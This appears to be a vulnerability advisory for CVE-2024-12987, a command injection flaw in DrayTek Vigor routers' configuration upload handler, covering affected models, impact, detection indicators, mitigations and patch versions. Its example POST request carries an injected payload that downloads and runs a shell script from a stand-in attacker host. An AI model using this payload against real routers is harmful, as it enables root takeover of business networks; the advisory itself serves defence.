CVE-2024-12987 allows OS command injection via DrayTek Vigor router web interfaces. Learn which models are affected and how to mitigate this critical flaw.
Summary of CVE-2024-12987
A critical OS command injection vulnerability (CVE-2024-12987) has been identified in DrayTek Vigor2960, Vigor300B, and Vigor3900 routers. This flaw resides in the web management interface, specifically in the apmcfgupload handler within the mainfunction.cgi endpoint.
CVSS v3.1 Score: 9.8 (Critical)
Attack Vector: Remote
Attack Complexity: Low
Authentication Required: None (in some cases, depending on interface exposure)
The vulnerability allows remote unauthenticated attackers to execute arbitrary OS commands on affected devices.
Affected DrayTek Router Models
The following devices are confirmed vulnerable if running unpatched firmware:
- Vigor2960 – Enterprise dual-WAN firewall
- Vigor300B – Multi-WAN load balancer
- Vigor3900 – Enterprise-grade VPN concentrator
All models are typically deployed in:
- SMB and branch office networks
- Remote site VPN hubs
- ISP-provided enterprise CPE equipment
Technical Analysis of the Vulnerability
The root cause lies in insufficient input sanitization in the web interface’s /cgi-bin/mainfunction.cgi/apmcfgupload handler. This endpoint processes configuration uploads, and due to improper validation of uploaded payloads, attackers can inject shell metacharacters (e.g., ;, &&, |) within POST parameters.
Exploit Path:
- HTTP POST to
/cgi-bin/mainfunction.cgi/apmcfgupload - Crafted payload with command injection embedded in one of the config fields
- Shell executes the payload with root privileges under
lighttpdor equivalent web process
Exploitation Details
A successful exploit enables:
- Full shell command execution as root
- Persistent backdoor installation (e.g., crontab modification)
- Firewall rule changes, VPN reconfiguration, or credential harvesting
- Use of router as a pivot point or proxy into internal networks
Proof-of-concept (PoC) code has already been observed circulating in private threat actor forums.
Example POST Request:
POST /cgi-bin/mainfunction.cgi/apmcfgupload HTTP/1.1
Host: <router-ip>
Content-Type: multipart/form-data; boundary=---abc
...
Content-Disposition: form-data; name="cfgfile"; filename="exploit.cfg"
dummy;wget http://attacker.com/payload.sh|sh
Risk Assessment and Potential Impact
| Category | Details |
|---|---|
| Exploitable Remote | Yes (WAN-facing interfaces especially risky) |
| Privilege Level | Root |
| Authentication | May not be required if interface is public |
| Persistence Risk | High – attacker can modify startup configs |
| Target Scope | Routers in over 20 countries (based on Shodan) |
This flaw is extremely dangerous for any unpatched WAN-exposed DrayTek deployment, particularly in SMBs with limited security controls.
Detection Guidance and IOCs
Network Indicators:
- POST requests to
/cgi-bin/mainfunction.cgi/apmcfguploadfrom unusual geolocations - Suspicious
User-Agentstrings or command injection patterns in logs - Outbound connections to attacker infrastructure (e.g., payload download URLs)
System Indicators:
- Unusual processes running under root
- Unexpected cron jobs or modifications to
/etc/rc.local - Presence of binaries in
/tmp,/var/tmp, or/mnt
Suggested Detection Rules:
- Suricata/Zeek rules for
apmcfguploadendpoint abuse - Log parsing for shell metacharacter usage in
cgi-binPOST requests
Mitigation and Security Recommendations
1. Apply Firmware Updates Immediately
DrayTek has issued firmware updates addressing this flaw. All organizations using affected models must upgrade without delay.
2. Disable Remote Management
Ensure WAN access to the web interface is disabled unless strictly required.
# Check and disable on CLI
router(config)# no remote-management http
3. Enforce Firewall Rules
- Block external access to TCP port 80/443 to router web UI
- Restrict access by IP allowlists (VPN-only access recommended)
4. Monitor and Audit Logs
- Look for anomalous HTTP POST patterns
- Analyze router system logs for configuration changes and unauthorized access attempts
5. Replace EoL Devices
If firmware support is not available or the device is end-of-life, decommission and replace with supported models.
Vendor Response and Patch Availability
DrayTek has released the following patches:
- Vigor3900 – Firmware version 1.5.1_RC3
- Vigor2960 – Firmware version 1.5.1_RC3
- Vigor300B – Firmware version 1.5.1_RC3
Patch release notes and updated binaries can be accessed via DrayTek’s official support portal.
Conclusion
CVE-2024-12987 is a critical remote OS command injection vulnerability that directly threatens core networking infrastructure used by thousands of businesses globally. Given the low complexity and high impact of exploitation, organizations should treat this as an urgent remediation priority.
Neglecting to patch these routers could expose enterprise networks to backdoors, data exfiltration, and total network compromise. Apply updates immediately and strengthen perimeter defenses to block potential exploitation attempts.